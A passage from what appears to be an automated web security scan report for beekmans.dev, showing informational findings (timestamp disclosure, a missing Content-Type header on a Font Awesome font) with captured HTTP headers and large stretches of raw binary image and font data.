          <S÷83H:`Ú/ˆT*Î`<L¸ñ**,¬¸X¹v•Ü4Á5«Ü£¸Ã]Á!õ3*%C"ÃP«5<Ô"~ØZ†ÈQ›¸—5zÄ×QÓÝõÄy¹BhˆÌ'€âp,^àv™à©”­ôËöà䉐Ù9L{X®Ö{'²[¹l0„©P•,X±bŋá.	R¡‚<		R¥J•*T©R¥Jò¥AˆwRá
          ¸ÄáHðòy¸B:‹”²%XQp›ŽBÑ	†;œ‘ï	!æˆD˜˜cd@crÒ¡‡¨Ž˜@±Ø3û!±¸5bEÙy„ÄfYT†ʔEL\­¬piŠ‘½CՉ Ô`é.…G0ò‹æ¨®Ï‰Ò&ĈÀ´BÑO¼CéGóDè!¸ºP†GÅA¦GÅÌ@‰^Âál¸ƒp¼?Üÿt©—û™ÂÉ~
          AÊ2’¸ÂjIÝ9’eî@ÃÈ¿QW0b–¦4‰q|˗#–Ή¦Pæ&©Ì+!d3*À¸—à‹d¶Zá¬ÎX9#bå*„±‹>)lÑ2PŽà[°„^Ü%p@¤U33f,DLM³K
          efnAst¡‚ë¸àEE—ˆ hwb%Pĸ‡Hn]B$Duê—>§û"´‡Üe¥ìÎs{›pâÔ÷4³™y›ÃOs‡?¨
          f£lpîS—­L¥~ç1-iù‹y×¹_Éõ+å•x¾cjòyœ@ú¨:^}B”§¨ómj1HŸ1Œ¿$1‹ƒââÆ1bÅòB¥@  @„ÂfT©R¥J•*T¯À J•C¸r‚„"®Uƒf¥;™ã4¨0KÐ#…!‰jdZ4X&¼B Ç„\GpcÌÌ¡ÂòC3¸6J@^=F¢à!Éî ±a1äÖ#%œGPÜܺ—GqÁ(NØ0*aT?qx %ÎfB,ÇP€è”6Kša¬B–šJ€†
          šËPL‰á7LÍ"QàÄõµR刢ŒËà†¹Mâ—Y‚@Œ|$Z„4Š„Ù‚ZœFª`Ã	qÞ%`xόÁo§ÜF_î‚mþãvç$ŽÂÃÂÆ.åJšÆ=& æªS¡0ü–jŒ~F	† ¶8‹A—@bTJ˜•6ŽQs8”d‡h˜œÁ¸sø§ó‰„P̘ ×2²Û‰<²àaÆY
          ‰hq©ádH,¹0ÔrÀ¶c);Sý@ÔL¸sm'dykkÜ+ qÄD,=TW_±˜HqHÅ}ÔC°·4È\ν½DÞ¿ó3jýC¸tf‡ú™Ôɘâ‹ÒJãpfb¬€;.å\Ê^!ÒiUÒú‹È0¼–;‰@¯²#*=j&wðˆ7×`Ä"QOI3@žÈÉô’áÔ\;câJ„¼Ë—
          K—,X±AA¨Ê•T©R¿•*T	R¡4‡pÁˆzTE펄¸N?2<Ár)B\^#8œÇÃâ.bÙ80âfeu
          å@ÁƒaŸˆL]õ·‰Ä*£:‹Ä6Jމµ‹á.kÍCPˆ®! TÍáû–PQPNÄ9å0ÿqT &LŠ8ÁCi•ˆa,fÄL°Ôb>Bê. *ÇSl<„-Â
          á‘à`x´AÚ%•-åÔYÚ{‘*m	Ä(A|1S#SçÀƒ .6Ô,%¢,.ÓÔAĵÃ/åAšÇ·•óý@ˆáÌ¡«&``B84å*LLª4„ƒ>©w52ÌJc˜Œ1ÁË2æa‰£æ%ˆi BŸhïâ‹!2Ê̲̣|¡hb^Äj.GÅÔw*eCóŠÒvF²£‹{•@Ää7+eÀ:s(ÖÕ@öˁ2¨¥P°JfJû†ûƒ–¡ßRæ„ê:Ó²Ú»ãöö˜ñʍ·mP2â0®®8cí8g5ˆ¶§	̸çL`«‹o$i•ƒ6f°ËÄ@1å~•¤¨®¢ˆÀååØ9rT¸±bÆ1ð JA '3*T©_…J•*T©R ~A¸rʶ
          HXCˆ¨K„5ùžæÃæ!³$¨â:‚KÅÃH‹,©j#\\ÅDÊtĸÄ:ŽÃ
          ÃÆ˜½£iÂc͕.Œá!* CcÜV.Tl3é—¡‰­„:ƒ(q¼Ô-	híŽ#Um‘‚Ï‹‹V	¹†àVfÉ”mÒ1t•tšMxFÞ1#‡êZU#‹XFê˜´¼Eٗ)hÂU
          |
          8ÝTÇ6…;OL¦P–7Z•‹RN9+æ:؉¬Q¸õÿRž(¡:É{`bîWP`òŠë«†ÈVM$b¨$J¶^±ódMçÅ\H}«pa„[¸âcã^0°fUMdËà”Æ( š6QBRf)ÜÒ>D„—ªT"ç°›b0’ŤÃ
          0w˜·˜r†½Ærsî`F¡A—Ä̪§ãl›™À{û„Ô‘jÏþÄÔAX¨XG>âÄ¿‰¶Dx~"W©‡53ƒ;ƒ,[¢dúܼ¢™ì†·¸·àÜF»˜3Žðt3Ñu7ÔøBqâ>ž,X±| @! @•*&#æ¥x¯+Åx?!Ü9`ffi—1F?É1ˆL0ê24e˦ÈÀœBȖÇSR&`2ê
          äF.`•GÄ
          lÙM0Lc:™È?„ycÐRZÛ
          A‰Ã8œ@haeªªðnVFcˆC˜Õq.Wâfa, QˆK30Û°¸À\ïQP—d¬Åˆ±`ÑÜڀò‹(f Äsbv£Ù¨V1¨ñd	EÊ©K#–5„¦Rê¸2+%×RÓ$
          UKÀD¸ŠJÌÃ$´¦61
          “ÀÁE. Bs! 1ªŒ¡l‚† –Gr„YaaKªDzíû™wý÷ÞrX|,mȅ¨FXO1ÀŽ©XPsâ<Ȍ¬G€‘nà›û‰Ú¬Êæj_ˆË
          y5R®q•̯é&3³¨hÙ2ÝÁµc…ˆE¹ø"’j«cðî݄g$­J,ê1C²ÌM{ƒF`‡Ö¡‡RÀ,öfe¸6Hm5ó‚˜é¼W‡ý‘ÄöJVç¤xÓÂ×ú<ßÂ¥¦Ä=’˜JG‡8Œ'2î#N#^!^!xúχ…Å‹\! @Bƒ†eÆ2¼Wšñ_‘ø:‡9`xjnJ–™£±øž0˕I
          }#³U˜ÇÀÖ¡*Z„™xě¦!`rJC¹£â;€¡ËYŒh¸¨ÑYD¾`D¢5ˆÁJ/pm5‚ÜvÅî:Q•'ƒs¾+‡LÈAåBÒeRaV¸`@2á1‘ˆ"%€p(bÓؕ(‘)ƒŠ\ž£’¢J1ÂYÃñ`MN’å¨Ío1Äg­MUÊÑ	 ,ÂójbIUÔa:ž¨Ô>¡¼@Z„ä"¬Á˜ÁMÄVm<‰‰‡p¢"¸J|61|[LŵÄà#­QfÜZË_Ë©k.¡ÀÍz‚‘ÊAS
          ÐÀ¡˜Âôr³TÂ4S­\%CÎļmŲ±L¸ÃÃ2Cø:Eníê>-I†ê¡ê±±¸-.a)i\2±
          \aüËÍ9‹.߸¥[‰nV˜´R½%“Ô3Ú|³ß¯%LÙ¦å&Ä÷)Ë4¨<æoù™2Å*°€#&¹Žorîá#û¹Çq÷̵•—pÍû€J0õ[ôêѾãCˆì‘t‰epã=Qðþ3ã/Ãø!%@ð@„K—._ƒÅy¯5+ò<:aÄ9f ¬€Òb¡¹‰2'‚/›*–bR‘—©V°Ò	b¨UÍ£j}ÅÑ26ñ’ˆSqÔ¼¥Fi—ŸÆdÜ̔Mp°²Ô“#²æ‘ƒPܺ„u†)ª3	[,Þ3`‹C+(6àYŠ<As1f!•–6cˆÛŠ·A¹Wx$.R,3IwPa†‰D‹MôQ—óȇZ‹6G0Fsf
          øƒpò8C”#PŠ`x„ D¸|&êñ
          n(8®$­DRâdKFTÅ["B¢P	ahDT:jŽ6˜Ûð¯À•˜#™L5
          e„v„”ÿq Þþ`|ãḥÊm¦\¹râÂ\tL¬8ƒqê_´‡`|N,ʌnE#¢Ðæêµ\JD«ÝÇAl|îp¤-¯î
          ˗vø‹¯fbq‘iî6ۘ{ýA]Ô‹&H¨à¼D]T£#o=KÑoÄVÔÃáË0Â=ى»…Yk¢<J7™a*ûÌ
          G„ÊBˆ€º¿À˗à„!BT	P!A—/ð<ךÿ㯗À´©vò¥ñPŠàÿ¯ˆÔYP«j2f	PÜ0CfáúU(O1YdnÒ;³'èâîµ ÐUæT¶j¢GU`§ŒÌNc¨»1@„QB0\D¢T	3¼€Žçé—¢ÊfᇘJxƒa¥G‚æ
          'Šõ˜ž9R0P1
          ¹‰Ìu
          D¸iŸpTe
          \³V)L±(%”µKË%·Š4À9‰+BŒ2¡‰s8—nq„(Ž8ЬF
          ÃLAð—,–q14@ö±RMF"DB"¹„;–ØD¬Àb;¥QÌk’@2 ‚˜²ÂÁà£J¨êgÅcð?˗`S/Å˗.æ>!˜y70"ÿö
          ·¶ Ä&<»!_0ÕKF³p‹zÕÇ®n¸`#CüG@e»!µtüq4fKXÉÕق%]Ùózƒ®+©m{Ž}&fm9TÜmÌêŠAÔnà*iF—3÷9ƒ-¸ÚLqr·j¬4nåÄ.î6Šm
          £
          ·å¨B„!¡#
          Çaà‡ƒÉùO.¦¬ÝŽÉbC2f«Ã¡O‚m CŽcf&'1Ã.G-3\¦n0`ïô)x%ý)6k
          -¿“1Áı\
          CÌ®‚åb\bg…ÚÃQM¤
          œ[2ÈepS$VLDŕXâž%cø˜På™R%Ôa„Ì˨µ©.Ô:ÉD]sÂeY´"ÄQ|L÷.BĆ<Eah0   B\~.1./XJ#]%Ú쏃¥0³f"K@E).–›÷*ó~˜¨æ&eþcâ£à—ø æ2áæÿ\u6›Ã^MÀ ‹šb3n¡bÒÔ¨úŒÖ¯¸rq
          Å7ïpÜ:fë‰p½›˜Ç#¹T¨®Z¹ÇÔÏR¨dÜnîh“ÔXàý@ø„)¥Å»Ä²ïâ`æVZCLÂ]’ó’{ƒöÅ]ϯ	2ÔH õ@·P¼Þ¡’ÑpÜš²;fý‘–;n6Ä©‚±eÏÿÙ
          Evidence
          11111111
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

  4. Risk=Informational, Confidence=Medium (2)

    1. https://beekmans.dev (2)

      1. Content-Type Header Missing (2)
        1. GET https://beekmans.dev/vendor/fontawesome-free/webfonts/fa-brands-400.woff2
          Alert tags
          Alert description

          The Content-Type header was either missing or empty.

          Request
          Request line and header section (396 bytes)
          GET https://beekmans.dev/vendor/fontawesome-free/webfonts/fa-brands-400.woff2 HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
          Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Referer: https://beekmans.dev/vendor/fontawesome-free/css/all.min.css
          Connection: keep-alive
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1127 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:18 GMT
          Content-Length: 72120
          Connection: keep-alive
          last-modified: Fri, 15 Mar 2019 09:41:25 GMT
          etag: "119b8-5841ed7a2a572"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JjPpLc7tanLzfbBuDvNxwlgmZiuQsZAFJ5b9CnY1RH8RpsHIRHdLWAPdfeSiaWQFhJB%2Ft%2F33A4jBMDI8gX3Ne63AyjnTj4TLrmNnjf1w6nCtM8TXDY4%2BunK9P06%2B9Zo%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a4be8c7a1ede-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (72120 bytes)
          wOF2¸
          èX_IxÔ?FFTM`Šj
          †ü$…¸I6$†D Ч[S‚qÆÐ¸ëðt@@©Znóž2!là0Þ̌`Þ¦³ÿÿÿAR‘1“Òu+€¨zñª¿?IðЍ¡Ant]5'8jh®¼ˆÖ
          Ç|h¼! ¢ã	Kž/W|I2D2D2DÇD¢´fn˜3Zp3v’!’!’!\²u
          jÜ1•Üï‰}A2T$#É×+Y²?žÖ©ÌOT:P  “á=¸Û½Uó¥7®§K•—³óú¤Ð`Ëlí‚KƒCÖ®&z¿ŽÉ¡¹—¹!H"A$¥ÃY´8WÌ8sÙ?Ž_ª5NƧsƒccßëMˆîÑ˲¥ç݊¿·9Û}Œÿ×Bå:½©Ã/“å³O-½ÙáSæÙü¾À¶a/u6ߞìúÿª:§»ûv{æJó HˆÄ؊~HOÓùÏ΢'±&•‹5UHÒԑH–¦bh±Šá-Et+&&3løgȘ8&ʄ‰³ÏćèÒfB΁OρU.ƒ
          ©œ‚iû¥¾õWüÂÿí£ídžwêÀ…4ßxÀ¦¿w£ó¯kÿ‚ÝO<Š ¦ÅOcP(Mpå‘X~z·ìÍ´§þeþ¥–=s…­d PQÌ,Éd¡"ž­)œÙø2µ7­L󍇐
          H'Q¾ã.W”|Ž
          ÜeC©®gfKÊ֟F^á--õkÙvÆ9d"²Òt¹¸™GߣݿW£»,]É(¿Ëș
          þwöýž†M0ò9À±Ò…#÷ðý_­ôûˆy»ˆYވ(h¬Ìʁ¡AhÄJ°ÜË}fú{±©ÜVž¿(h·À–šÀ,¸²òÿYÎ?ûG¦«ª¤·UÉ°Îà×x]]%ݝÂ
          Òît:™–àÎ#tΙ¼ñ«àœC!̅ÀC:·MÆÃËßk«^ÏvI*•JêR7ÏôÐîÎûn€C¥HAè ·ƒ#‡Î¾CÌüNÙ´ê®ËºÓÈö‚À2‘,6X«Äò,d‡A2“jRÛˆZl8Âÿ–ÐøØØØ0"Ëá¡}¿±B¡˜RP÷ß;A…¦oÙ
          ö½©20£¯?ŸÓªÿ®ÿÏña†í¸`l«º²TåíÍqép‘®Ò.ä@ƒÀhUR0ÔÄ‹ðÿçÒ>©³“’Jrh2˜Ïùsz³}o–ïm/Ê.'ڝcÜlÀ‚Õ¬†çû_ªï,\Q§DJ¥’lÀBèýtEgTÒ
           !Ü¥þo¶¬ÿª	˜-I÷ûÛv¸ù/ûí*l4ÉOi˜ ‚qú‹
          Ûí‰ùי®vÐw¥»Tâ·ŽY¦¾ÎôuÉX¾ï¶/`߬sÀW`	¦6ӗ‚úö]ª”‚¶¯ ¥"MÉMà13,Æ£]¾¤<u›;O­ïçDj*¤>ŽBx_—Oð#TMªý½¦V)i÷!Ïìáî½®™[½{ÙA8A¸I‚÷ÿŏH@É@j€r¤Ü-¤-’[V{¶dyÍí¹î=Žƒ¤¶@ÊÝ")»E¹/Éîë¢î‰ö8Î  špkãhƒdá­}¨û–䯝H8ÛgwšŸ¯Yûx˜p˜Ã1Š£§¨Šª
          gðß±™³àl{ÔH€°E¬âQ{?~d[o w÷Ó
          0§À!¡,ØÞ™³þÚØ…sàc«u’ä2.w!6*ðÉa|fÙà¬ßYŽ‹šñô£²pÄ«ê¾åÀGØ
          €mÓ0±pÓÜ­5·\öƒÿýþ«ÿ+¼wèú9Wð~]ÕږVÓíRvŸV§Aòv\Hú¼[ÒÌL¹[Û¨³ø	‘®Lµ:¦ê 3‹…ƒ›OJh‰õö;â7ÃÑ0¬Úÿ°cϾâêkŸzçÓ·ì<vîʍç½ém+vxÝ& ô¦šÃÎÅ/¢D@õ,°Ä
          [l·Ë!GéÁx¸¬?ä¯};_\/·þlóÈp|	'‘Rª3/K²<ƒ4çìg>†ñN~͒ÙÒ±ßv›UUÇUßiUc-¶ÜNçuu×u´;o´ØÀù\e
          æ»”¨P«Áí¡þ4«= ¢c‘ö:¬/,5~eÈ
          :&7÷*±É·¯Û¼íèÉ¡YïµoÝ~©Tx“øg0rò
          Š©„&]ó,²®j2j#Ö4Ù¾š¯qïŠCb×ڛ.¬¿Óp¸‰¡öæfÛ®·ý7e¬Þ¸zÀMÿќR‘•‘–æçdcef2Þ°¥ŠJ•ÈÆÊϞ‹r™H¨!y,zÿöáx؎’(LE˜M]ر¯Ë<
          ]۔E–&qàJ çÞæÿ›¿óWþ­/ÙÓܳÒRQ¢š¼”„)´ˆÏ•3¢O[Y£z‰4½˜GB|õìÿ÷³Ï·k[·f6oâ¦êK3´Ä˜º±ÆҙojÇ}pÉ'uæ?DW‰_`7éàÖžÜ,<Þæò+äJ¼¥Ø½Ƕ*o…¢†Ž¦­Jê)“Þпbn
          èr¿$•í¨O©t—Ò‘Qˆ‚÷TF T‘bÆÚÓ.X:x±¼eü˜tŒϊîÃ
          ڙ8Ì‹•£.WÊú“œˆ·¤ÆiI,²£“¯¥jœ„Ñv!/Ӑ%ª¥糥↤°"ÎÑ9£ÝšÛãh¬Ÿd¬ÅWïP{„d`ì,Ø´.É,|k
          ÓSaŒ¥”W¦—]@‘fÿ’¹û³<ú«%B'EóҍÄù(b*`£1Ít›Â2Õíjh‚Qs^*×´Åez…$DFdœ¡Œ°ÆQ<
          ر#ÅZRÚ£Ü$'ÙX…­\Q¨Ñ¸»„FßCm
          27Hǖ
          Øw«-*ÊvžÏ’˜KŒE+Šv‡‚˜ ©aMVFFIòMm9åp?Ϛîò¸d‘Qw‡õj3,n‡–¹€dfÙ Èz
          	1³Ã¡ÅõÀ5D–uqº4Ä(HR1¼Ÿð­dý¶+ب/$Àå|D”et˜•XXœØQVºœÙmd	ÀàÙìÈK/bºJYDjcî¡'q¸_…ȈGBä,¬:§ƒcô4ëÕPDאּ#œ°7Ù`l
          SØÄp/3EòsÓ»ÞBDVʺŸäxB–¡@Z=“§£¯ õ'u"æF¢¼ITʂÑ*Qu¢(1‡=­Ë¡HpkœHçQÊ*	ˆÏÏI\©˜ÿXI–ZAvÎÓ,Æ,gã³Cœb',ˆe—¨IÒ²L¹tãq#̽ÃUóvgéðVªâMџ©&Ì[¤rt£Ìº-ÛT´Vót=
          >™ÙPƒöœù9"‹iڍ“¤dN“­P=‰%âI ß åúµVo”²[â»OÉ×ö®èçn»,
          ÌãG,[`dFƒþðfë±B`Äñ‹Ï¤!J Meýj\žå-8…hÉzc'—iKdÍÅA=/{õ"W‘bñ Ê`/µœµeÒ·%²Ø~9ïJ.|GõêT¸'Ó=¿rª)"æe`kî[‹-Æt<¿œã©Aá]µ¶-žÓa5uí¢*Û7öÞ}¿Žœ±H«ÖÀ@”Cç“Fö¾ˆ´“`jŒõëÀ¿'¬-ˆ=©¢fÒ¸–§ÌÿM¤ÛO¹tHŒ²±›@bL²¾¼læMø±¸pÎ'Y'ÂS¿Ð©¥'ñ³£·„OߪårÁHi¢F™jÉ÷—[k"×Ýü’D¶ªö=Y˜ìgâû;©h:"ÚGܛ¥iXþE¢uÖ§*RK>¹
          ˆšéÙÃG(D	$Æ2aîV;È%/^©xŌÛfÐö‹&æ™ÖN
          Ü|*loK664ø]²Ð02[¾Œt¬xâÒd„mƽߥðé|`ãáW#ô•´€Zïù"Tk„­nF_Ddiõy<Y,»à7easu-îIºã®¢Æu*šJ<Z\al]¦IpÈý,ֆª˜uáäÌA¦Ûl)+播ÕS±FÔ!MQ2]¬-ï­ª÷{Q 4:ÑÆ$°,¾¤ÿÀqÅÛi²Ð´ZćˆZgã¤æ«°¾]žo֏å•?·³¾
           Æ4ñ&2äōœc—ˬ™ãyfÎÛ&kóÕT³çQ›.Ìõ¹‚’=v{MlØ€ýâ°¼`® ؍¸bñ8r¡/°tKp°^Œs
          Ç(͏0²Þ‹€ —½‚xM³jŽmñÿ·‡M‘}µ2òÂÿ‹'Ï{¯çIÝ!†ú)¥íТôÉd¼£€‰'6›Ù×ÑyÔØçFìwu•5Û¸œšØéíY¾2è°â#a¬6`ÌqÏûGì‡
          ÷­1±YÀ…8þJÓÿI¡óµKǧKӟ©Å°ZP5«ú*T)C0¾“|FB™…Ñ€rmn*»GfµÙY]É7âüg”®7­4Ѹ«±HŠŽ±FAºÔÆр’DiL|~(vÐ#,.0€€š™­ƒa“ñ)e4ßÃ(½¿
          èÁe(î ƒ‹é§¯óCŒž™ò—‡UÙ<FT…û1 ôø§má|Ótå}<áïЊzjr]½™ôaÃ/›=½lnAYmOŒ©DÜw†À“Ms—ï
          J4Ĝ/~GVBo‚I¸L> 
          …u¹ÃУŽ¼“‘`5œMVé"~Úô‹å©æZˆ'šÑ7ŒTáT0ßE>DqÕ!ËÔ{N¹t-¬å°(%³dÓ,·¨Ö‰†lZJR-¤ZUDÊÁ®®›
          ’¡Ò–ɐk4CÎ\a•çiwq5fæÐñ úHõ…z^#WåÖ!X×މÆó­%øÞ`”êÇ+§YûOZµÕ ¨HŒAëJ àÏDR@oêXÆÄ F‡áäªÎÙz/“÷ gc´‚N»2 ö)ÖÓMdayR!ͦGmv+6Ö¨¦Zu&^yA‘<VÉåöĕ†gêgÜúÿÝ<cj#û°jì¿æœŸ‡(¸™·»°^?Uv«~Ÿ—æí5o+Š÷©[ƒªx4ÑßøpÎ}1¾Q¾Í7v®LP­z=Ïmžü³Þb"Ânœv	 ´Ì~2;Ó'|é~rLBZ¿&c³³þtÄaÂå¯>õŠþûc½©µÌcPÂ양™Šübe•¬³eü´…¾^ú&c4¨hàÅm£ÍƒuãÎŔ);¾—݇ãîqõýcˆ•WOÜhV¼Žqö;*«ÿŒ¨&;q¼±©}WîiN䕍~¹ï͝åɉIaýòè±>ÞO“™¥±®½Fu؟gö:R3¶µ‰Þ|áÂF
          „UikË¡‰òz	t@·‘Ôì“å1"vöI kĤö@ëÛ¦
          =:ÊwÕ|YÐUß­…6d.ß ùjl{‹6sÚ¿þ#[Ø)TÜHÜ䃤¥¦úcé°Æ”ãÙò¨J2ÙÚCÑûƒÈªwx¢%òscR`W\ɀ‡‡æÁ>>ª°Öbb?®‰'’s¥2û¢Á¡(R—ápÎHþ8;ƒ
          óüæz;®y[&Ž©÷¼
          „‚°ß銲ò¤ÿ ¹ŸÞŸ¸«©OB6IʝåÁH‘w{»ê%ôaåìÁÅ*ޒKÜØKxg·ä4·M¥©&M+ÌSPݎc¥2EJlld™Q}γVªœH/ãËÅkot?!)Ú/„†ÏóÙú` …Œ$?¬ôÞøRˆažŽHé߈/£›ƒ¤±¸xÔÿ•o~‹²Ç
          p“‘ŸÔœ oƒqàVOÜI`ùø éÉ©-ï͊ËõA@minèÕë+5KIF?Âz¼Õv—­N-•x{´ø9 Ã0 ³:ÍÉ4܊﵊íÆ
          ¸˜ròœ¤Y¾¡˜VÎkQ;ò$ÿHóq¶õ«òÖS»™í­kîÊn#O+§‰š¢³iU¼ õ–5õ@a]ÓÕo—O%Ȅf…ݼqXC%ÕDg+/R»a²•eNÄpé/Í6>îŒËz¹7?3ê;Û5Gû£k#Ȁ™Æï@隌)5T€,ËPåëjž8djH’€†Rÿ2F%›R½TP‡H‚„ ¾å߬óº
           QpX1Û¢¨xÏ=Œgx)@g“ØÙT–Y**†?wˆôG×ß"ä¤cž££q¨‚ŒSí÷2XMśTb‘FRf%§:uW“ËŒÂSšÚåºb‰S•x¹½IB+(©œÌj¤ÞqBN[üÓå@÷íd’žÐ1»1ù–^œeùηëF|LÄW7:“f†Lxûñä˜Ýt #§m쐩”‡Y¦¾y¡¢ŠW'>ñR; j-ƒ0dÞV͹zT¦B¹—(ͪoŸ÷¥Ö©´'.äJÉ“vƒT“‘1_vlüÂ	
          æMà8v1ÕJo&{çÙ}³ýƒàSŠN–LrUЪÄf^r¹‚°Â´6MƒÓÁCÊ$ÕRPQv\ë+¾‘\GHÍáЍáš‚¢ÍxV–×½ÒQÅE×;¿×kZÍeýè¹^ÕAÓߨ´]“Ü`S ~”@ѨiùÓ¡Vj䦐2w§xg_}]¼Ö¿>úüF<•÷ûٓ`ñ󔚵º—×A†GðŒ‘ٍÎ]L®ì&‹qö.ï¿~¬ ñÿþgëOŸÞ°ÜŸˆ¡Q²9_9½ÿÉêáõÓKjŒƒLþ	]•½ÁŸ•ÓT[¡wŸ¿ÞÛÝÙF§\VÃÌCÛfÃúOçÇìΏ°¹<{…·£Ý %{PÚ ÌC
          »*Õ¾<ÜÆSƄW;_íOÓþ@Ʌ»Á£*µS|"a›TÁ„‹®èÔMÚÉA•pvóSGåHÔ-ëGÑhÑe»¨ù©¨U¨‹1‹ÇSÁñW¾{æ[qMðýÑXÇ.ù!—Î:é$W8{¤"ì*GZn1‡
          s—ï ƒÎh	ã!C~Âàª+}LJ(:7>—;=¤µÇŸ2GùÔ[&´¢úýCIvngÓãDwh?!¾q¤Ÿç?;"ˆyrñ¢X&w’r£™Ì\Ìþ;¤
          v.DÊBâ5ám
          þšÝ-î‹yxç"€sc5fN³r„ªÇ\7MœÔš0»ö#a_H]4R$|Nô¢ŽCoœí˜37‡7îÉpÍÒJtzÖT†§1UÖñFàvöÁ¼'Cø‚z`dbm͌»*Ð^FåóYôšTQ
          iÐØ‰öæ_‚\he…Ø8gNü³V™V„­5ýÖ$”FžÑ‚Ù^BA‚æ.ÃTçƒÙ„@ÿ®ŸÜd*gÐqÙJ¡“Xܽд,ã2f1,“!>Ô ˆ*˜©Dæ•:(èîØÉøp
          ìp'¬ÅÁ'†½ÚÍÃüÜñdjH”#*ځf-ëÕWaåË¡zŒÇ[ªdèK†"÷! /‡Íć/qFDZd£ePÕðMä~­~5U˜3c=Y_žlZ•Þêò`9¶×”|±×òL§5w’¯Ó‡²Þ½Gï¡’geWTãk7Ÿb¹A!T¼’Z	ƒ&h»ÖL•I1ÞÈáSÄ-ÉAÞÞ9ØyîÜ!ýkbïa³{§÷ÅveSpú×ûVûf¿¼;™Ø‡Aˆ·«Ü\=ý²	WB@ºuîÄÔýŠó¿b¯¨hpx¶oî»{;¸wªûiÀ½Ñµ³/É2†;zæQ/ƒø2]Å84	YXØ7ÝiÅ.ÙÖX1±Ÿ$ìF‚8rxkó+ötÚâaøm$㧪ÄlÛQsOS[ÖFã45qòõMºeAgÓh¿­¾x]þb–­0ÉL^ƽ·ÆsÃø¥’ÛçefR¾Ÿ<ÈîÅÕXéÉwÚÂö1wᬚa¨ºI–Õ²‰žÀ~Ùü—Ä
          ¿‰©y\H ªY1¡œ•'>.¸#³“¯;—?n?Ê<Îùe6¨dB°L­ÉU‰q„x¦žê˜F‘•¥iêÀ7OŒÈ
          ¼¿©±HÄg|¼-ìĒ
          46_¨¼½6À¾9	ù„œ<iA#jFএ	¦âìhÏ1)’>.læ~vÅÒߺ¶³&,‘«ƒ[!êW)f÷åàÁ{;8´ûì3§œað‚¤x¢8ð%Óï%2ìA¨5¢nZ£!PL¼Ñ|ççÚê.Ž5ïØ¬ÿ¼a)‰3¿vj÷„d{&‘ŸêÑO·1ì"Üß¿ñêÓÀÖaiêyçøÖ(BsP½IŸBÑ;~¼¡Y¤¡ÕÎÃ|±<“TMVo#ð]8vj·ÐŠÍb½Ÿ-®N¯€DÐrp¹¸3QC¾’Ìjœ»/<ó(Š­:(U<Ә—¥gW÷Ù-©Q2ÕLÝ?L«hð •xÙEGÎ?ÛŖkO¾*[NŽ\a×às½ïÈú‘ØAľmŽæ3{üsîc¼W“0[EÒAªK_®´{ŠÍï~àÞKrFGÿèù§µÛƒ38Óû'"ô%QÜ,Ù5Ù¹Ff^sßK+µ3ö3èPÞo”>j8¡¡b~+ýI/ý®*ã{ÕüÇÕ@#„ìÔûUg©s“œœÿè‘ódtiØ4Âè7Mƒ¢Ë19œÅ'„’mSø¼’!ÄÓ)Ë‹ƒš!PW3&bcõû¯µc ²3ȑÖÉò'ƒ!¦ÍrIÌ}6þh>՛*W®²íh	ŠOÀ´=·­`™ øÿÍ=¥©KȲ_ĦÅ!:RPQzþvŽT/¿hÀ’5y¬Ó†õø;6,êvm–Qƒn™Dš<}(ÚP¦¼žèè?«ë;e·üÓTµC¨|³[aZµïC„XÕ÷úY0ní.9ªN¶ÔHá+èo&_5ãZè‹cÞƺ[Â=qmºÐł8á4Ì¥%¨ÆÅÿìߋï¦÷“'Ûõ'¬pÏÍíMõÇåì
          @­»8õe¢ûþ|ÜGF„3óõUZ…ÊöZÜ/½™tUºñM|†!Ël½ú¤x¤`è!8P`˜fÀ}QɪèË6/sgBu‰LK­ä~@˨®÷`íƒèmÿðcŽ•Š[áÕ#Q‰h“èç²1F‰ÝÕ´'†Dµme£mwˆÙ1u‰v$8޶¡Ýã|ÝÏόèòÛãMÜ(“ŸÐlD­FÆÌyï/ŽwÌξ’)Ì.2ë~o‚™”?ŒÈ¬µš[Nר!NýÉWZYmü\Å:ž(PæÜ‘–­·'!%àÓEa½ï–“©¬>ñM+Ú/žh4$t˜sb4)pZ0@Ûïˆ80–ùò“tü®Ä:õ‹žÝ!ô~õf~r‰$‚Ži{ˆR"o&O“AayAãaßDäi*º¸RaGuL“bc›[Õµ®Û¯ü-q¥þeJÞAo(ä!p,~bÁÂ_ò½ðÂè
          œ` ŽP3ÔgÜ!¸£%2šÅ'X¥
          1°Ì舢¬ã?Ë)ƒ´ø
          X5ÐePšöN>ßÃͧ)[BÂ¥@ï)qϯåSñ2['SjràˆZLXtÈϬ·¶ÐLáDO¯(6*;ÖËØŽÓi
          üZ#ÁÜÆ2BæÍ	@òÊx];œ‹yHcH@€
          åB£‰±qu|òËÒ¤Á±Ë·ˆö`¹a’¢È]¨}(H³„{èq°*äPĒɹ»©Ïk‘އ †ôà(ld¶	¾V±1Ð.Êè_í¾ÐÊ&Èù² 0žˆy…ÁÔ㔦¨ã2Ì£ÙÌt•‰P|(
          >ИcEú>i@BàÊÞ´Z¼QATM¯²ÆÐ©Ðæxƒ(þۃS
          ¸±n¼7)"ófÂ)¹Ô öŠBÓþ
          9¾m¨¡x…áMqÈ@êdÄcŒ|­Þ™²Îë&Lì–W$°Á­‰/i
